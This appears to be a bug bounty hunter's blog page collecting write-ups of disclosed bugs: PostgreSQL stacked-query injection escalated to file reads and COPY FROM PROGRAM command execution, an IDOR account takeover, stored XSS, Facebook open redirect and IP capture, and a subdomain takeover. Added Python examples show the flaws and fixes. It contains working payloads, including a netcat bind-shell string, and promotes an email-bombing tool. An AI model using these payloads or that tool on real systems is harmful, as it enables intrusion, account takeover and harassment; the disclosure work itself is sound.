Abdul Wahab

Security Engineer | Synack Red Team Member | Bug Bounty Hunter

Turning my passion into my professional life. I love to break things and dig as deep as possible. I believe no system is secure. Acknowledged by Google, Facebook, PayPal, Twitter and 250+ tech giants.

Blog

PostgreSQL Injection to Remote Code Execution

 


Aslam-O-Alaikum fellas! In this noobish article I will write up my recent finding: a PostgreSQL injection that allowed an attacker to access the database and, furthermore, to read and write internal files.


PostgreSQL, also known as Postgres, is a free and open-source relational database management system emphasizing extensibility and SQL compliance. It was originally named POSTGRES, referring to its origins as a successor to the Ingres database developed at the University of California, Berkeley.

The program is a private one, so I cannot disclose its name; let's call it "private.com". The application "private.com" loads datasets from the database through a GET request that looks like this:

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC&page_number=1&page_size=10&search_text=%22%22




In the above URL, the 'sort_on' and 'sort_order' parameters are used to build the following query:

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC LIMIT 20 OFFSET 0

The values of 'sort_on' and 'sort_order' are inserted into this query without any validation of the user input. An attacker can therefore terminate the original query and append a query of his own (a stacked query).

Like this,

https://private.com/private/datasets/?context_details=%7B%22company%22:%22Context+1%22,%22brand%22:%22Brand+1%22%7D&sort_on=last_modified_date&sort_order=DESC%3bSELECT+version()--%26&page_number=1&page_size=10&search_text=%22%22

The above URL inserts our payload ";SELECT version()--&" into the SQL query like this:

SELECT * FROM prod.dataset WHERE (isactive is true) AND context_id = 'private' ORDER BY dataset.last_modified_date DESC;SELECT version()--& LIMIT 20 OFFSET 0

and KaBOOM!
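To show where the bug lives and how it is closed, here is an added Python example (not code from the program; the column allowlist and the two request URLs are constructed from the requests above): the vulnerable string-building that produces exactly the query shown, beside an allowlist-based builder that rejects the same input, plus a one-line check usable as a log or WAF signal.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed allowlists: the only column names and sort directions the endpoint
# should accept. Anything outside them never reaches the SQL text.
ALLOWED_SORT_COLUMNS = {"last_modified_date", "created_date", "name"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}

# Query shape from the writeup; {col} and {order} are the two injection points.
BASE_QUERY = ("SELECT * FROM prod.dataset WHERE (isactive is true) "
              "AND context_id = 'private' ORDER BY dataset.{col} {order} LIMIT 20 OFFSET 0")

# Constructed request URLs: a benign request and the stacked-query payload from above.
BENIGN_URL = "https://private.com/private/datasets/?sort_on=last_modified_date&sort_order=DESC"
ATTACK_URL = ("https://private.com/private/datasets/?sort_on=last_modified_date"
              "&sort_order=DESC%3bSELECT+version()--%26&page_number=1")


def sort_params_from_url(url):
    """Return the URL-decoded (sort_on, sort_order) pair from a request URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("sort_on", [""])[0], qs.get("sort_order", [""])[0]


def build_query_vulnerable(sort_on, sort_order):
    """The pattern behind the bug: raw parameter values spliced into ORDER BY.
    Identifiers cannot be bound as query parameters, so they get interpolated."""
    return BASE_QUERY.format(col=sort_on, order=sort_order)


def build_query_safe(sort_on, sort_order):
    """Hardened form: only allowlisted identifiers are ever spliced into SQL."""
    if sort_on not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column: %r" % sort_on)
    order = sort_order.strip().upper()
    if order not in ALLOWED_SORT_ORDERS:
        raise ValueError("unsupported sort order: %r" % sort_order)
    return BASE_QUERY.format(col=sort_on, order=order)


def is_stacked_query_attempt(sort_order):
    """Detection signal for access logs or a WAF rule: a sort direction should
    never contain a statement separator or a SQL comment marker."""
    return ";" in sort_order or "--" in sort_order


if __name__ == "__main__":
    for url in (BENIGN_URL, ATTACK_URL):
        col, order = sort_params_from_url(url)
        print("vulnerable:", build_query_vulnerable(col, order))
        try:
            print("safe:      ", build_query_safe(col, order))
        except ValueError as exc:
            print("safe:       rejected,", exc)
```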



Now, to list all the databases, the following payload can be used:

;SELECT datname FROM pg_database--&



Remote Code Execution with PostgreSQL Injection

The following payload confirms whether we are a superuser or not, and luckily I got Superuser = True :)

;SELECT user;SHOW is_superuser; SELECT current_setting('is_superuser');SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;--&


Now we can simply read internal files like this:

;SELECT pg_read_file('/etc/passwd');--&


To write a file, the following query can be used:

;CREATE TABLE hw (t TEXT); INSERT INTO hw(t) VALUES('nc -lvvp 2346 -e /bin/bash'); SELECT * FROM hw; COPY hw(t) TO '/tmp/hw';

According to the program rules, I am not allowed to make any changes to the server.

The following queries can be used to achieve remote code execution:
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output
COPY cmd_exec FROM PROGRAM 'id';        -- Run the system command via the COPY FROM PROGRAM function
SELECT * FROM cmd_exec;                 -- [Optional] View the results
DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table


Thanks for reading.

./Logout

Account TakeOver Using IDOR (ZeroCopter)



Hello Buddies,

Hope you guys are doing well. I am really a noobish guy named Abdulwahab Khan. In this article I want to share the PoC of one of my findings in a private program at ZeroCopter.

So without wasting time, let's move forward to the actual PoC. While testing the program I didn't find anything on their main website except for two or three low-impact bugs, which I didn't report because I knew they would be duplicates. So I looked into the bounty brief again and saw a secondary website, and started testing it too. After completing account registration I went to the account details page to test for XSS- and CSRF-type attacks. Unfortunately they are using good WAF protection against XSS, so I tried a CSRF attack. The request looks like this:


CustomerAccount.CustomerId=4884c354-5c06-4014-8cdb-978aa7d4fd08&CustomerAccount.FirstName=Abdulwahab&CustomerAccount.LastName=Khan&CustomerAccount.Email=hackertabish786%40bugcrowdninja.com&CustomerAccount.Phone=&profileBirthDate=&myAccountSubscribe=on&profileSignUpDailyDeals=on&__RequestVerificationToken=XdRptyf0jaMfI0VqnRHh7b0g-qo7M420BfdrssU8gNf_md6n4_himhPVpUDn3hYjMmqrqq3cWqE5Znlv7oMRwPtrve5tZ80baAZvzg4Y1NCYCvZqyHc_9nJBcSQt3XTK_rbQ1itYopth1T6eM6H7Cg2
Now there are two things here that seem interesting: CustomerAccount.CustomerId and __RequestVerificationToken.

I tried removing __RequestVerificationToken and forwarded the request, and it changed my profile settings without validating the verification token.


After that I quickly created a new account with another email address, captured its profile-change request, removed __RequestVerificationToken, changed the CustomerId to my old account's, and forwarded the request.

The response was:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Request-Context: appId=cid-v1:6179475f-85be-4c05-84ee-87e58617700f
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Date: Fri, 19 july 2019 10:01:31 GMT
Connection: close
Content-Length: 32

"Your profile has been updated."
Now it was time to check whether the profile of my old account had really been updated. It had.

After a few moments of happiness I realized: how can an attacker exploit this if he doesn't know the victim's CustomerID? I started looking for the CustomerID by testing APIs and JSON files, but failed.

Then I logged out of my account and saw an Unsubscribe button. I clicked it, and it only asked for an email. When I entered the email and clicked "Unsubscribe me from updates", a pop-up appeared asking for a password. I looked in Burp Suite, and there was the Customer ID.

Now I had a full scenario for account takeover just by knowing the victim's email.
The steps:
  1. Get the CustomerID via the Unsubscribe button
  2. Change the email using the IDOR
  3. Request a new password on the new email
  4. BOOOM!
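The two server-side defects this chain relies on, the antiforgery token not being validated and the body's CustomerId being trusted over the session, next to a hardened handler, as an added Python example (not the program's code; the field names and the victim CustomerId come from the request above, while the session store, the secret and the attacker's id are constructed):

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed server state for the demo: a random antiforgery secret and two
# logged-in sessions. The first CustomerId is the one from the request above;
# the attacker's session and id are made up.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {
    "sess-victim": "4884c354-5c06-4014-8cdb-978aa7d4fd08",
    "sess-attacker": "00000000-0000-4000-8000-00000000abcd",
}


def issue_token(session_id):
    """Antiforgery token bound to one session: HMAC(secret, session id)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def update_profile_vulnerable(session_id, body):
    """Behaviour described in the writeup: the token is never checked and the
    CustomerId in the body decides which record is updated (session_id unused)."""
    form = parse_qs(body, keep_blank_values=True)
    return form["CustomerAccount.CustomerId"][0]  # record that gets written


def update_profile_safe(session_id, body):
    """Hardened handler: constant-time token check, then the record is chosen by
    the session, and a mismatching CustomerId in the body is rejected."""
    form = parse_qs(body, keep_blank_values=True)
    sent = form.get("__RequestVerificationToken", [""])[0]
    if not hmac.compare_digest(sent.encode(), issue_token(session_id).encode()):
        raise PermissionError("missing or invalid __RequestVerificationToken")
    owner = SESSIONS[session_id]
    if form.get("CustomerAccount.CustomerId", [owner])[0] != owner:
        raise PermissionError("CustomerAccount.CustomerId does not match session")
    return owner


def attacker_body(token=""):
    """Constructed attack request: attacker's session, victim's CustomerId,
    attacker-controlled email, token removed unless one is supplied."""
    return ("CustomerAccount.CustomerId=" + SESSIONS["sess-victim"]
            + "&CustomerAccount.FirstName=Abdulwahab&CustomerAccount.LastName=Khan"
            + "&CustomerAccount.Email=attacker%40example.com&myAccountSubscribe=on"
            + "&__RequestVerificationToken=" + token)
```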
ZeroCopter timeline:
  • Reported: 19 July 2019
  • Accepted by the ZeroCopter team: 19 July 2019
  • Work in progress: 22 July 2019
  • Asked for retest: 26 July 2019
  • Marked as resolved: 26 July 2019
  • Received bounty in my BTC wallet: 27 July 2019

Regards,
Abdulwahab Khan
Independent Cyber Security Researcher.

HW-Bomber Python based Email Bombing tool


Hello Guys,

Hacker Wahab here. Today I am going to show you my first ever Python pentesting tool, named "HW-Bomber". It is an email bombing tool which integrates with the Gmail and Yahoo servers to flood a victim's email.

Download Here:-

 https://github.com/hackerwahab/Hw-Bomber 

Watch Tutorial:-


Note:-

For a Gmail account you must enable "Less secure apps" from here:-
https://myaccount.google.com/lesssecureapps

Stored Xss in Freelancer

Hello guys. Hope you are doing well. Today I am disclosing my recent finding on Bugcrowd. I found a stored XSS vulnerability in the main domain of Freelancer, i.e.,
http://www.freelancer.com/

I reported it and got nice Freelancer swag and some kudos. I am also expecting a reward from them, but anyway.


So, let's move on to the PoC of my submission.

POC:-

  1. Login
  2. Go to the profile and click Edit
  3. In the Bio section add the simple XSS payload, i.e.,
  4.    "><script>alert(1);</script>
  5. Click Save
  6. Open the profile in a new tab
  7. XSS! BOOM

 Watch Video PoC:- 




Report Summary:-

Submission created
2017-03-30 13:31:50 UTC

State changed
2017-03-31 06:29:04 UTC
Freelancer Engineer changed state to resolved

Freelancer Engineer rewarded you with swag

Thanks,
Abdulwahab

Facebook Bugs | By Hacker Wahab


Aslam-O-Alaikum (Hello) guys. Here I am; this post contains all the bugs I have found in Facebook.

1. Open Redirect & Content Spoofing

Vulnerability Type: Open Redirector
Vulnerability Scope: Mobile Site or App
Title: Open Redirect & Content Spoofing

Description and Impact:
Hi,

After getting a lot of low-impact issues, I come back with an open redirector issue.

Reproduction Instructions/Proof of Concept:
In the reporting section of Facebook, all the sensitive options are disclosed in the URL:-
https://mbasic.facebook.com/nfx/basic/question/?context_str=%7B%22initial_action_name%22%3A%22REPORT_CONTENT%22%2C%22breadcrumbs%22%3A%5B%22offensive%22%2C%22hatespeech%22%2C%22religious%22%5D%2C%22story_location%22%3A%22page%22%2C%22is_from_feed_tombstone%22%3Afalse%2C%22actions_taken%22%3A%22%22%2C%22is_rapid_reporting%22%3Afalse%2C%22reportable_ent_token%22%3A%222237869389770846%22%2C%22is_impostor%22%3A%22%22%7D&redirect_uri=http%3A%2F%2Fwww.hackerwahab.com%2F&prev_action_info=%7B%22action_name%22%3A%22UNSUBSCRIBE%22%2C%22completed_title%22%3A%22Posts+from+%5Cu200e%5Cu0645%5Cu0648%5Cu0644%5Cu0648%5Cu06cc+%5Cu0628%5Cu0631%5Cu0642%5Cu0639%5Cu06c1%5Cu200e+hidden%22%2C%22completed_subtitle%22%3A%22Poc+is+of+OPEN+REDIRECT+AND+CONTENT+SPOOFING.%22%7D&av=100015350014851&_rdr

After redirect_uri= we can add a web address of our choice, as I did in the above URL, and after completed_subtitle you can add the content-spoofing text.

As we are interested in the open redirect: click Done, then in the survey they ask for community stars; give them, then click Next, then click Submit. A new page opens with the vulnerable URL.
Video PoC:-
https://youtu.be/oFTKN7WWvQs
Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties? No
Can you reproduce this issue every time? Yes
How did you find this bug? Manually / Other

2. Delete Primary Email (Which Is Not Allowed by Facebook)

Vulnerability Type: Privacy / Authentication
Vulnerability Scope: Mobile Site or App
Title: Delete Primary Email (Which Is Not Allowed by Facebook)

Description and Impact:
Hi,
Myself Abdulwahab.

As you know, there is no way to delete a primary email, but I found an indirect way to delete a primary email.

Reproduction Instructions/Proof of Concept:
As you can see in {POC 1.png}, there is no way to delete the primary email. On the mobile site there is also no way.
We can use this URL:-
https://m.facebook.com/settings/email/?remove_email&email{Primary email Goes here}&refid=74

to remove the primary email.
When you open the link, the account's primary email is deleted, as in (POC 2.png).
As I cannot upload a video here, I used YouTube.
Video PoC (private):-
https://youtu.be/BUG1PLnCJjw
Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties? No
Can you reproduce this issue every time? Yes
How did you find this bug? Manually / Other

3. Change Account Password Without Knowing Current Password

Vulnerability Type: Privacy / Authentication
Vulnerability Scope: Main Site (www.facebook.com)
Title: Change Account Password Without Knowing Current Password

Description and Impact:
Hi,
My name is ABDULWAHAB. I am writing this to you because I think I can change the password of a logged-in Facebook account without knowing the current password.

Reproduction Instructions/Proof of Concept:
1. Go to Settings
2. On Mobile, add a mobile number you have access to (enter your mobile number)
3. Log out
4. Click Forgot Password
5. Enter the mobile number you recently added
6. You receive a code; enter it
7. Enter a new password and DONE!

As you can see, in the whole procedure I don't use the current password, and the account password is changed.

Fix Suggestion:-
Ask for the current password when adding a new phone number.

Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties? No
Can you reproduce this issue every time? Yes
How did you find this bug? Manually / Other

4. IP Steal Using Content Injection

Vulnerability Type: Privacy / Authentication
Vulnerability Scope: Mobile Site or App
Title: IP Steal Using Content Injection

Description and Impact:
Hi.

I found a content injection issue on the mobile site of Facebook. It has low impact on its own, so I tried to increase the risk of the vulnerability and found a more serious problem: IP STEAL.

Reproduction Instructions/Proof of Concept:
1. Open a Kali Linux terminal
2. Command to listen on a port:
nc -lvnp 1337 (you can use any port)
3. Log in to a Facebook account
4. Use this port with your IP in the following way:-
https://m.facebook.com/deactivate/incentives/?carrier_name=HACKED BY ABDULWAHAB&carrier_logo_src=http://192.168.1.16:1337/&free_days=25555
5. When the user opens this page, the IP is captured.
Video PoC:-
https://youtu.be/g2naYvWm4j0
Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties? No
Can you reproduce this issue every time? Yes
How did you find this bug? Manually / Other

5. Content Spoofing

Vulnerability Type: Other Vulnerability
Vulnerability Scope: Mobile Site or App
Title: Content Injection

Reproduction Instructions/Proof of Concept:
1. Go to Deactivate account
2. Choose any condition
3. Click Deactivate
4. Now you see an ad
5. Customize it by using its URL

Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,
Is this bug public or known by third parties? No
Can you reproduce this issue every time? Yes
How did you find this bug? Manually / Other

Video PoC(ALL BUGS):-


Sub_Domain TakeOver iwantmyname


Aslam-O-Alaikum,

Brothers and sisters. Today I am going to disclose my recent finding on iwantmyname (Bugcrowd).
Through this issue I was able to fully take over a subdomain.

Tool used:-
Knockpy (a Python subdomain finder)

PoC:-
  • I found a subdomain of iwantmyname.com.
    This subdomain had the nameservers and DNS records of WP Engine, but it was not linked to any WP Engine account.
  • Replication steps
    1. Go to wpengine.com
    2. Buy a membership
    3. Add the domain
    http://an.iwantmyname.com/
    4. Done
    The subdomain now belongs to the attacker.

  • Reward: Kudos

Stored Xss in OnePageCrm


Aslam-O-Alaikum,

Friends, hope you all are fine. Today I am going to share the PoC of a stored XSS I recently found in OnePageCRM.

OnePageCRM:

OnePageCRM is a simple online sales CRM for small business. Focus on your Next Action to easily convert leads into customers and grow your business.

Summary of report
  • Submitted: 2016-11-20 15:33:41 UTC
  • State changed to resolved: 2016-11-29 13:00:26 UTC
  • While testing OnePageCRM I observed that the signup field (Address field) is vulnerable to XSS, so I tried it and it popped up, to my happiness.

  1. Sign up with the contact name in the Address field below:-
  <script>alert(1);</script>
  2. Log in with the account
  3. XSS executed

Thanks,
ABDULWAHAB,
Independent Cyber Security Researcher,

